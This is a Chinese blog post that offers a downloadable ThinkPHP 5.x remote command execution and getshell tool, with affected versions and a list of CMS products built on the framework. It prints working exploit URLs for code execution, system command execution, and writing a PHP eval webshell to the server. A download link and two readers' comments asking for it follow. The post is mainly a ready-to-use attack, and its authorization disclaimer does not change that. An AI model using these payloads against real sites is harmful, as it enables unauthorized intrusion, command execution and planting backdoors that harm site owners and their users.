News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

ThinkPHP 5.x远程命令执行测试工具(可getshell)

jasonx 1237 2 条
该工具只能授权验证网站漏洞和站长验证漏洞使用。
禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。

影响范围

  • 5.x < 5.1.31
  • 5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。

  • AdminLTE后台管理系统
  • layui后台管理系统
  • thinkcmf
  • H-ui.admin后台管理系统
  • tpshop
  • FsatAdmin
  • eyoucms
  • LarryCMS后台管理系统
  • tpadmin后台管理系统
  • snake后台管理系统
  • ThinkSNS
  • DolphinPHP后台管理系统
  • WeMall商城系统
  • CLTPHP
  • 齐博CMS
  • DSMALL
  • YFCMF
  • HisiPHP后台管理系统
  • Tplay后台管理系统
  • lyadmin后台管理系统
  • haoid后台管理系统

漏洞验证

1.jpg

命令执行

2.jpg

getshell

3.jpg
4.jpg

下载地址:

链接:https://pan.baidu.com/s/1PhO5YcypKUQNCoO_ZieOKg
提取码:rbte

附上测试代码

#代码执行
?s=index/\think\Request/input&filter=phpinfo&data=1

#命令执行
?s=index/\think\Request/input&filter=system&data=系统命令

#getshell
?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker

#getshell2
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

#代码执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

#命令执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令

#代码执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

#命令执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
网友最新评论( 2 )

  1. 链接失效了,能再发一个嘛?谢谢

    MdJune 14th, 2019

  1. 链接失效了------大哥可以在发一份么

    123May 15th, 2019
发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址